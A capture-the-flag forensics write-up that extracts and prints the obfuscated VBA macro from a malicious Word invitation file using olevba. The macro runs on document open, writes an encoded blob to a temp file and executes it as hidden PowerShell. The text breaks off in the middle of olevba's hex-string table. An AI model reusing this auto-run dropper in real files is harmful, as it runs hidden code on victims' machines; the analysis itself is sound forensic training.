Halloween Invitation
19 minutes to read
We are given a ZIP archive that contains a file named invitation.docm:
$ unzip -l forensics_halloween_invitation.zip
Archive: forensics_halloween_invitation.zip
Length Date Time Name
--------- ---------- ----- ----
5252634 10-12-2022 08:04 invitation.docm
--------- -------
5252634 1 file
$ unzip forensics_halloween_invitation.zip
Archive: forensics_halloween_invitation.zip
inflating: invitation.docm
$ file invitation.docm
invitation.docm: Microsoft Word 2007+
VBA macros extraction
This means that we have a Microsoft Word document with VBA macros. Instead of opening Microsoft Word, we can use olevba from oletools to extract the VBA code:
$ olevba invitation.docm
olevba 0.60.1 on Python 3.10.8 - http://decalage.info/python/oletools
===============================================================================
FILE: invitation.docm
Type: OpenXML
WARNING For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub AutoOpen()
odhsjwpphlxnb
Call lmavedb
End Sub
Private Sub odhsjwpphlxnb()
Dim bnhupraoau As String
CreateObject("WScript.Shell").currentdirectory = Environ("TEMP")
bnhupraoau = sryivxjsdncj()
dropPath = Environ("TEMP")
Set rxnnvnfqufrzqfhnff = CreateObject(uxdufnkjlialsyp("53637269707469") & uxdufnkjlialsyp("6e672e46696c6553797374656d4f626a656374"))
Set dfdjqgaqhvxxi = rxnnvnfqufrzqfhnff.CreateTextFile(dropPath & uxdufnkjlialsyp("5c68697374") & uxdufnkjlialsyp("6f72792e62616b"), True)
dfdjqgaqhvxxi.Write bnhupraoau
dfdjqgaqhvxxi.Close
End Sub
Private Function wdysllqkgsbzs(strBytes) As String
Dim aNumbers
Dim fxnrfzsdxmcvranp As String
Dim iIter
fxnrfzsdxmcvranp = ""
aNumbers = Split(strBytes)
For iIter = LBound(aNumbers) To UBound(aNumbers)
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + Chr(aNumbers(iIter))
Next
wdysllqkgsbzs = fxnrfzsdxmcvranp
End Function
Private Function okbzichkqtto() As String
Dim fxnrfzsdxmcvranp As String
fxnrfzsdxmcvranp = ""
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3734203635203636203132322036352036382034382036352037342031") & uxdufnkjlialsyp("31392036352035312036352036382039392036352037362031303320363520353120363520363820383120363520373620313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313230203635203638203130") & uxdufnkjlialsyp("37203635203739203635203635203131372036352036382038352036352037372031303320363520353420363520363820313033203635203737203635203635203532"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203638203635203635203734") & uxdufnkjlialsyp("20313139203635203535203635203637203831203635203937203831203635203537203635203637203939203635203930203635203635203438203635203638203737"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203839203130332036362031303620363520373120373720363520373820313033203636203130372036352036") & uxdufnkjlialsyp("37203438203635203737203635203635203438203635203638203737203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203132312036352036382038312036352037372036352036352035") & uxdufnkjlialsyp("33203635203637203438203635203738203131392036362031303820363520373120363920363520373720313033203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313232203635203731203639203635203737203130332036362031303620363520363720393920363520373920313139203635203130372036352037322036352036352038302038312036352031") & uxdufnkjlialsyp("3130203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373120313033203635203130302036352036362034382036352037322036352036352037392031303320") & uxdufnkjlialsyp("36352031313820363520363720353620363520373420313139203635203535203635203637203831"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352031303020313033203635203537203635203639203130372036352039382031303320363620353020363520373120353620363520393720313139203636203130382036352036372034") & uxdufnkjlialsyp("38203635203835"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31303320363620313038203635203732203737203635203130302036352036362037382036352037312038352036352031303020363520363620313131203635203731203536203635203930") & uxdufnkjlialsyp("203635203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203637203438203635203836203831203636203132322036352037312038") & uxdufnkjlialsyp("35203635203831203130332036362031303420363520373220373720363520393720383120363620313036203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373020363520363520383920383120363620313231203635203732203737203635203937203831203636") & uxdufnkjlialsyp("2031313720363520373120393920363520373320363520363520313136203635203730203835203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3939203130332036362031313220363520363720363520363520373420363520363620313139203635203637203831203635203939203131392036352031313820") & uxdufnkjlialsyp("3635203731203831203635203738203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520313232203635203731203733203635") & uxdufnkjlialsyp("20383920313139203636203130362036352036382038392036352039302036352036352031303320363520363720343820363520383320363520363620313038"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352037312036392036352039302036352036362031303820363520373220373320363520393920313139203635") & uxdufnkjlialsyp("20313033203635203639203635203635203130312031313920363520313035203635203639"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363920363520313030203831203636203438203635203731203130332036352039") & uxdufnkjlialsyp("38203131392036362031323120363520373120313037203635203130312031303320363620313034203635203732203831"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520393720383120363620") & uxdufnkjlialsyp("313138203635203731203532203635203733203130332036352035372036352036372038312036352039372038312036362035372036352036382031313520363520313030"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313139203636203131312036352037312031303720363520393820363520363620313038") & uxdufnkjlialsyp("2036352036372036352036352037352036352036352031303720363520373220383120363520393920313033203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("34392036352037312038352036352037352038312036362035352036352036372038312036352038392031313920363520353720363520363720313033203635203833203831203636203131") & uxdufnkjlialsyp("37203635203732"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392036352039382031313920363620313134203635203731203835203635203736203831203636203833") & uxdufnkjlialsyp("20363520373120383520363520393920313139203636203438203635203639203438203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036362034382036352037312031303320363520393820313139203636203130372036352036372036352036352037362038312036362038362036352037322037") & uxdufnkjlialsyp("37203635203930203831203636203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373120363920363520393920313139203636203131322036352037312037372036352038352036352036362031303420363520") & uxdufnkjlialsyp("37322037332036352039392031313920363620313132203635203731"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("35322036352039302031313920363520313033203635203637203438203635203836203831203636203132312036352037312031303720363520373320363520363520313037203635203732203635") & uxdufnkjlialsyp("203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37342036352036362031323220363520363720") & uxdufnkjlialsyp("35362036352037372036352036352034382036352036382037372036352039302031303320363520313231203635203638203831203635203737203635203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("353320363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635") & uxdufnkjlialsyp("2037312038352036352039392031303320363620313232203635203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352038312036352036362035352036352036372037332036352038") & uxdufnkjlialsyp("3120383120363620343920363520373220383120363520393720363520363620313138203635203732203733203635203937"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("383120363620353420363520373120363920363520") & uxdufnkjlialsyp("313030203635203636203131322036352037312035362036352039382031303320363520313035203635203638203438203635203734203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("31313220363520373220343820363520") & uxdufnkjlialsyp("37352038312036352035352036352037312031303720363520393020313033203635203130332036352036372031303320363520373420363520363620313036203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3637") & uxdufnkjlialsyp("20363520363520373620383120363620313137203635203731203835203635203733203635203635203131302036352036392035322036352039382031313920363620313137203635203731203835"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373420313139203635203131322036352036372036352036352031303120313139203635203130372036352037322037332036352038302038312036362031313220363520") & uxdufnkjlialsyp("373120383520363520313031"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352031303320") & uxdufnkjlialsyp("363520363720383120363520383920313139203635203130332036352036372034382036352038322038312036362031323120363520373220373320363520393820313139203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352036392036392036352038392031313920363620343820363520373120313037203635203938203131392036362031313720363520") & uxdufnkjlialsyp("363720363520363520383520313139203636203438203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3731203536203635203939203635203635203130332036352036372034382036352038322038312036362031323120") & uxdufnkjlialsyp("36352037322037332036352039382031313920363620313231203635203730203839"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520383920383120363620313231203635203731203130372036352038392038") & uxdufnkjlialsyp("31203636203130352036352037312031313920363520393020383120363520313033203635203731203835203635203739"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036352031303720363520373220373320363520383020383120") & uxdufnkjlialsyp("3636203830203635203732203835203635203130302036352036352031313620363520373020373720363520313030203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352037") & uxdufnkjlialsyp("31203130372036352039382031303320363620313130203635203637203635203635203736203831203636203734203635203731203532203635203939203635203636203439203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37322038312036352038342031313920363620313035203635203731203131312036352039302038312036362031303620363520373220383120363520373320363520363520313037203635203732") & uxdufnkjlialsyp("203733"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203739203131392036352031303720363520373220383120363520383020383120363620") & uxdufnkjlialsyp("373420363520373120353220363520313030203130332036362031313820363520373120313135203635203930"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38312036352031313620363520373020373320363520393020383120363620313232203635203732203831203635203834203831203636203130") & uxdufnkjlialsyp("3820363520373220383120363520393720363520363620313138"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203731203831203635203733") & uxdufnkjlialsyp("20363520363520313136203635203730203835203635203939203130332036362031313220363520363720363520363520373420363520363620313139203635203637"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3831203635203939203131392036352031313820363520363820393920363520393020383120363620313034203635203638203733203635203737203131392036362031303420363520363820373320") & uxdufnkjlialsyp("3635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("38392031313920363520313033203635203637203438203635203834203831203636203130382036352037322038312036352039372036352036362031313820363520373120") & uxdufnkjlialsyp("3831203635203733203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363620383120") & uxdufnkjlialsyp("36352036392035362036352038352031313920363620383520363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312038352036352039392031303320363620313232203635203637203635203635203831203635203636203535") & uxdufnkjlialsyp("203635203637203733203635203831203831203636203439203635203732203831203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3937203635203636203131382036352037322037332036352039372038312036362035342036352037312036392036352031303020363520363620313132203635203731203536203635203938") & uxdufnkjlialsyp("20313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3635203130352036352036382034382036352037342036352036362031313220363520373220343820363520373320363520363520") & uxdufnkjlialsyp("3131362036352036392037332036352039382031313920363620313037"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520373220") & uxdufnkjlialsyp("3130372036352037332036352036352031313120363520373020313135203635203835203131392036362035332036352037322037372036352031303020363520363620313038203635203731"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3438203635") & uxdufnkjlialsyp("203736203130332036362038352036352037312038352036352031303120363520363620343820363520363720353220363520383220383120363620313137203635203731203737203635203938"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036362031303720363520373120313037203635203938203130332036362031313020363520373020343820363520373920313033203635203534203635203730203835203635") & uxdufnkjlialsyp("203836203635203636"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("37312036352036382031303320363520373620313033203636203732203635203731") & uxdufnkjlialsyp("20383520363520313030203635203636203637203635203732203130372036352031303020363520363620313038203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("3732203737203635203735203635203635203130372036352037312038352036352037352031313920363520313037203635203732203733203635203735203831203635") & uxdufnkjlialsyp("20313033203635203637203438"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("36352039372031303320363620") & uxdufnkjlialsyp("3131382036352037312031303720363520393820313033203635203130332036352036372039392036352037332036352036352031313020363520363720313037203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("313032") & uxdufnkjlialsyp("20383120363520313033203635203732203737203635203938203635203636203130382036352037312038352036352039392036352036352031303320363520363820363520363520373620313033"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("363520353220363520373220343820363520383320363520363620") & uxdufnkjlialsyp("3835203635203639203733203635203130312031313920363520343920363520373220383520363520393920363520363520313232203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("373220373320363520383820313139203635203132322036352036382038312036352037382038") & uxdufnkjlialsyp("31203636203533203635203730203536203635203938203831203635203438203635203731203737203635"))
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs(uxdufnkjlialsyp("393920313033203635203131392036352036382038352036352031303220383120") & uxdufnkjlialsyp("3635203631"))
okbzichkqtto = fxnrfzsdxmcvranp
End Function
Private Function sryivxjsdncj() As String
Dim fxnrfzsdxmcvranp As String
fxnrfzsdxmcvranp = ""
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + okbzichkqtto()
sryivxjsdncj = fxnrfzsdxmcvranp
End Function
Sub lmavedb()
dropPath = Environ("TEMP")
Set rxnnvnfqufrzqfhnff = CreateObject(uxdufnkjlialsyp("536372697074696e672e46696c6553797374") & uxdufnkjlialsyp("656d4f626a656374"))
Set ktmlmpc = rxnnvnfqufrzqfhnff.OpenTextFile(dropPath & uxdufnkjlialsyp("5c68") & uxdufnkjlialsyp("6973746f72792e62616b"))
secret = ktmlmpc.ReadAll
ktmlmpc.Close
Code = "powershell -WindowStyle hidden -e """ & secret
x = Shell(Code, 1)
End Sub
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Function uxdufnkjlialsyp(ByVal tiyrahvbz As String) As String
Dim nqjveawetp As Long
For nqjveawetp = 1 To Len(tiyrahvbz) Step 2
uxdufnkjlialsyp = uxdufnkjlialsyp & Chr$(Val("&H" & Mid$(tiyrahvbz, nqjveawetp, 2)))
Next nqjveawetp
End Function
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |AutoOpen |Runs when the Word document is opened |
|Suspicious|Environ |May read system environment variables |
|Suspicious|Write |May write to a file (if combined with Open) |
|Suspicious|CreateTextFile |May create a text file |
|Suspicious|Shell |May run an executable file or a system |
| | |command |
|Suspicious|WScript.Shell |May run an executable file or a system |
| | |command |
|Suspicious|powershell |May run PowerShell commands |
|Suspicious|Call |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|CreateObject |May create an OLE object |
|Suspicious|Chr |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Hex String|Scripti |53637269707469 |
|Hex String|ng.FileSystemObject |6e672e46696c6553797374656d4f626a656374 |
|Hex String|\hist |5c68697374 |
|Hex String|ory.bak |6f72792e62616b |
|Hex String|74 65 66 122 65 68 |373420363520363620313232203635203638203438203|
| |48 65 74 1 |6352037342031 |
|Hex String|19 65 51 65 68 99 65|313920363520353120363520363820393920363520373|
| |76 103 65 51 65 68 |620313033203635203531203635203638203831203635|
| |81 65 76 103 |20373620313033 |
|Hex String|65 120 65 68 10 |363520313230203635203638203130 |
|Hex String|7 65 79 65 65 117 65|372036352037392036352036352031313720363520363|
| |68 85 65 77 103 65 |820383520363520373720313033203635203534203635|
| |54 65 68 103 65 77 |20363820313033203635203737203635203635203532 |
| |65 65 52 | |
|Hex String|65 68 65 65 74 |3635203638203635203635203734 |
|Hex String| 119 65 55 65 67 81 |203131392036352035352036352036372038312036352|
| |65 97 81 65 57 65 67|039372038312036352035372036352036372039392036|
| |99 65 90 65 65 48 65|35203930203635203635203438203635203638203737 |
| |68 77 | |
|Hex String|65 89 103 66 106 65 |363520383920313033203636203130362036352037312|
| |71 77 65 78 103 66 |037372036352037382031303320363620313037203635|
| |107 65 6 |2036 |
|Hex String|7 48 65 77 65 65 48 |372034382036352037372036352036352034382036352|
| |65 68 77 65 90 |03638203737203635203930 |
|Hex String|103 65 121 65 68 81 |313033203635203132312036352036382038312036352|
| |65 77 65 65 5 |037372036352036352035 |
|Hex String|3 65 67 48 65 78 119|332036352036372034382036352037382031313920363|
| |66 108 65 71 69 65 |620313038203635203731203639203635203737203130|
| |77 103 65 |33203635 |
|Hex String|122 65 71 69 65 77 |313232203635203731203639203635203737203130332|
| |103 66 106 65 67 99 |036362031303620363520363720393920363520373920|
| |65 79 119 65 107 65 |313139203635203130372036352037322036352036352|
| |72 65 65 80 81 65 1 |038302038312036352031 |
|Hex String|10 65 |3130203635 |
|Hex String|71 103 65 100 65 66 |373120313033203635203130302036352036362034382|
| |48 65 72 65 65 79 |036352037322036352036352037392031303320 |
| |103 | |
|Hex String|65 118 65 67 56 65 |363520313138203635203637203536203635203734203|
| |74 119 65 55 65 67 |13139203635203535203635203637203831 |
| |81 | |
|Hex String|65 100 103 65 57 65 |363520313030203130332036352035372036352036392|
| |69 107 65 98 103 66 |031303720363520393820313033203636203530203635|
| |50 65 71 56 65 97 |203731203536203635203937203131392036362031303|
| |119 66 108 65 67 4 |82036352036372034 |
|Hex String|8 65 85 |38203635203835 |
|Hex String|103 66 108 65 72 77 |313033203636203130382036352037322037372036352|
| |65 100 65 66 78 65 |031303020363520363620373820363520373120383520|
| |71 85 65 100 65 66 |363520313030203635203636203131312036352037312|
| |111 65 71 56 65 90 |03536203635203930 |
|Hex String| 65 65 |203635203635 |
|Hex String|103 65 67 48 65 86 |313033203635203637203438203635203836203831203|
| |81 66 122 65 71 8 |636203132322036352037312038 |
|Hex String|5 65 81 103 66 104 |352036352038312031303320363620313034203635203|
| |65 72 77 65 97 81 66|732203737203635203937203831203636203130362036|
| |106 65 |35 |
|Hex String|70 65 65 89 81 66 |373020363520363520383920383120363620313231203|
| |121 65 72 77 65 97 |635203732203737203635203937203831203636 |
| |81 66 | |
|Hex String| 117 65 71 99 65 73 |203131372036352037312039392036352037332036352|
| |65 65 116 65 70 85 |0363520313136203635203730203835203635 |
| |65 | |
|Hex String|99 103 66 112 65 67 |393920313033203636203131322036352036372036352|
| |65 65 74 65 66 119 |036352037342036352036362031313920363520363720|
| |65 67 81 65 99 119 |3831203635203939203131392036352031313820 |
| |65 118 | |
|Hex String|65 71 81 65 78 65 |3635203731203831203635203738203635 |
|Hex String|65 122 65 71 73 65 |363520313232203635203731203733203635 |
|Hex String| 89 119 66 106 65 68|203839203131392036362031303620363520363820383|
| |89 65 90 65 65 103 |920363520393020363520363520313033203635203637|
| |65 67 48 65 83 65 66|20343820363520383320363520363620313038 |
| |108 | |
|Hex String|65 71 69 65 90 65 66|363520373120363920363520393020363520363620313|
| |108 65 72 73 65 99 |038203635203732203733203635203939203131392036|
| |119 65 |35 |
|Hex String| 103 65 69 65 65 101|203130332036352036392036352036352031303120313|
| |119 65 105 65 69 |13920363520313035203635203639 |
|Hex String|69 65 100 81 66 48 |363920363520313030203831203636203438203635203|
| |65 71 103 65 9 |731203130332036352039 |
|Hex String|8 119 66 121 65 71 |382031313920363620313231203635203731203130372|
| |107 65 101 103 66 |036352031303120313033203636203130342036352037|
| |104 65 72 81 |32203831 |
|Hex String|65 97 81 66 |363520393720383120363620 |
|Hex String|118 65 71 52 65 73 |313138203635203731203532203635203733203130332|
| |103 65 57 65 67 81 |036352035372036352036372038312036352039372038|
| |65 97 81 66 57 65 68|312036362035372036352036382031313520363520313|
| |115 65 100 |030 |
|Hex String|119 66 111 65 71 107|313139203636203131312036352037312031303720363|
| |65 98 65 66 108 |520393820363520363620313038 |
|Hex String| 65 67 65 65 75 65 |203635203637203635203635203735203635203635203|
| |65 107 65 72 81 65 |130372036352037322038312036352039392031303320|
| |99 103 66 |3636 |
|Hex String|49 65 71 85 65 75 81|343920363520373120383520363520373520383120363|
| |66 55 65 67 81 65 89|620353520363520363720383120363520383920313139|
| |119 65 57 65 67 103 |203635203537203635203637203130332036352038332|
| |65 83 81 66 11 |03831203636203131 |
|Hex String|7 65 72 |37203635203732 |
|Hex String|89 65 98 119 66 114 |383920363520393820313139203636203131342036352|
| |65 71 85 65 76 81 66|03731203835203635203736203831203636203833 |
| |83 | |
|Hex String| 65 71 85 65 99 119 |203635203731203835203635203939203131392036362|
| |66 48 65 69 48 65 90|03438203635203639203438203635203930 |
|Hex String|81 66 48 65 71 103 |383120363620343820363520373120313033203635203|
| |65 98 119 66 107 65 |938203131392036362031303720363520363720363520|
| |67 65 65 76 81 66 86|36352037362038312036362038362036352037322037 |
| |65 72 7 | |
|Hex String|7 65 90 81 66 67 |37203635203930203831203636203637 |
|Hex String|65 71 69 65 99 119 |363520373120363920363520393920313139203636203|
| |66 112 65 71 77 65 |131322036352037312037372036352038352036352036|
| |85 65 66 104 65 |362031303420363520 |
|Hex String|72 73 65 99 119 66 |373220373320363520393920313139203636203131322|
| |112 65 71 |03635203731 |
|Hex String|52 65 90 119 65 103 |353220363520393020313139203635203130332036352|
| |65 67 48 65 86 81 66|036372034382036352038362038312036362031323120|
| |121 65 71 107 65 73 |363520373120313037203635203733203635203635203|
| |65 65 107 65 72 65 |13037203635203732203635 |
|Hex String|74 65 66 122 65 67 |37342036352036362031323220363520363720 |
|Hex String|56 65 77 65 65 48 65|353620363520373720363520363520343820363520363|
| |68 77 65 90 103 65 |820373720363520393020313033203635203132312036|
| |121 65 68 81 65 77 |35203638203831203635203737203635203635 |
| |65 65 | |
|Hex String|53 65 67 65 65 76 81|353320363520363720363520363520373620383120363|
| |66 73 65 71 85 65 89|620373320363520373120383520363520383920383120|
| |81 66 107 65 |363620313037203635 |
|Hex String| 71 85 65 99 103 66 |203731203835203635203939203130332036362031323|
| |122 65 67 |2203635203637 |
|Hex String|65 65 81 65 66 55 65|363520363520383120363520363620353520363520363|
| |67 73 65 8 |72037332036352038 |
|Hex String|1 81 66 49 65 72 81 |312038312036362034392036352037322038312036352|
| |65 97 65 66 118 65 |039372036352036362031313820363520373220373320|
| |72 73 65 97 |3635203937 |
|Hex String|81 66 54 65 71 69 65|383120363620353420363520373120363920363520 |
|Hex String|100 65 66 112 65 71 |313030203635203636203131322036352037312035362|
| |56 65 98 103 65 105 |036352039382031303320363520313035203635203638|
| |65 68 48 65 74 65 66|203438203635203734203635203636 |
|Hex String|112 65 72 48 65 |31313220363520373220343820363520 |
|Hex String|75 81 65 55 65 71 |373520383120363520353520363520373120313037203|
| |107 65 90 103 65 103|635203930203130332036352031303320363520363720|
| |65 67 103 65 74 65 |31303320363520373420363520363620313036203635 |
| |66 106 65 | |
|Hex String| 65 65 76 81 66 117 |203635203635203736203831203636203131372036352|
| |65 71 85 65 73 65 65|037312038352036352037332036352036352031313020|
| |110 65 69 52 65 98 |363520363920353220363520393820313139203636203|
| |119 66 117 65 71 85 |13137203635203731203835 |
|Hex String|65 74 119 65 112 65 |363520373420313139203635203131322036352036372|
| |67 65 65 101 119 65 |036352036352031303120313139203635203130372036|
| |107 65 72 73 65 80 |352037322037332036352038302038312036362031313|
| |81 66 112 65 |220363520 |
|Hex String|71 85 65 101 |373120383520363520313031 |
|Hex String|65 65 103 |36352036352031303320 |
|Hex String|65 67 81 65 89 119 |363520363720383120363520383920313139203635203|
| |65 103 65 67 48 65 |130332036352036372034382036352038322038312036|
| |82 81 66 121 65 72 |362031323120363520373220373320363520393820313|
| |73 65 98 119 66 |139203636 |
|Hex String|121 65 69 69 65 89 |313231203635203639203639203635203839203131392|
| |119 66 48 65 71 107 |036362034382036352037312031303720363520393820|
| |65 98 119 66 117 65 |3131392036362031313720363520 |
|Hex String|67 65 65 85 119 66 |363720363520363520383520313139203636203438203|
| |48 65 |635 |
|Hex String|71 56 65 99 65 65 |373120353620363520393920363520363520313033203|
| |103 65 67 48 65 82 |635203637203438203635203832203831203636203132|
| |81 66 121 |3120 |
|Hex String|65 72 73 65 98 119 |363520373220373320363520393820313139203636203|
| |66 121 65 70 89 |13231203635203730203839 |
|Hex String|65 89 81 66 121 65 |363520383920383120363620313231203635203731203|
| |71 107 65 89 8 |130372036352038392038 |
|Hex String|1 66 105 65 71 119 |312036362031303520363520373120313139203635203|
| |65 90 81 65 103 65 |930203831203635203130332036352037312038352036|
| |71 85 65 79 |35203739 |
|Hex String|119 65 107 65 72 73 |313139203635203130372036352037322037332036352|
| |65 80 81 |0383020383120 |
|Hex String|66 80 65 72 85 65 |363620383020363520373220383520363520313030203|
| |100 65 65 116 65 70 |635203635203131362036352037302037372036352031|
| |77 65 100 65 66 |3030203635203636 |
|Hex String|121 65 7 |3132312036352037 |
|Hex String|1 107 65 98 103 66 |312031303720363520393820313033203636203131302|
| |110 65 67 65 65 76 |036352036372036352036352037362038312036362037|
| |81 66 74 65 71 52 65|342036352037312035322036352039392036352036362|
| |99 65 66 49 65 |03439203635 |
|Hex String|72 81 65 84 119 66 |373220383120363520383420313139203636203130352|
| |105 65 71 111 65 90 |036352037312031313120363520393020383120363620|
| |81 66 106 65 72 81 |313036203635203732203831203635203733203635203|
| |65 73 65 65 107 65 |63520313037203635203732 |
| |72 | |
|Hex String|65 79 119 65 107 65 |363520373920313139203635203130372036352037322|
| |72 81 65 80 81 66 |0383120363520383020383120363620 |
|Hex String|74 65 71 52 65 100 |373420363520373120353220363520313030203130332|
| |103 66 118 65 71 115|036362031313820363520373120313135203635203930|
| |65 90 | |
|Hex String|81 65 116 65 70 73 |383120363520313136203635203730203733203635203|
| |65 90 81 66 122 65 |930203831203636203132322036352037322038312036|
| |72 81 65 84 81 66 10|35203834203831203636203130 |
|Hex String|8 65 72 81 65 97 65 |382036352037322038312036352039372036352036362|
| |66 118 |0313138 |
|Hex String|65 71 81 65 73 |3635203731203831203635203733 |
|Hex String| 65 65 116 65 70 85 |203635203635203131362036352037302038352036352|
| |65 99 103 66 112 65 |039392031303320363620313132203635203637203635|
| |67 65 65 74 65 66 |20363520373420363520363620313139203635203637 |
| |119 65 67 | |
|Hex String|81 65 99 119 65 118 |383120363520393920313139203635203131382036352|
| |65 68 99 65 90 81 66|036382039392036352039302038312036362031303420|
| |104 65 68 73 65 77 |363520363820373320363520373720313139203636203|
| |119 66 104 65 68 73 |1303420363520363820373320 |
|Hex String|89 119 65 103 65 67 |383920313139203635203130332036352036372034382|
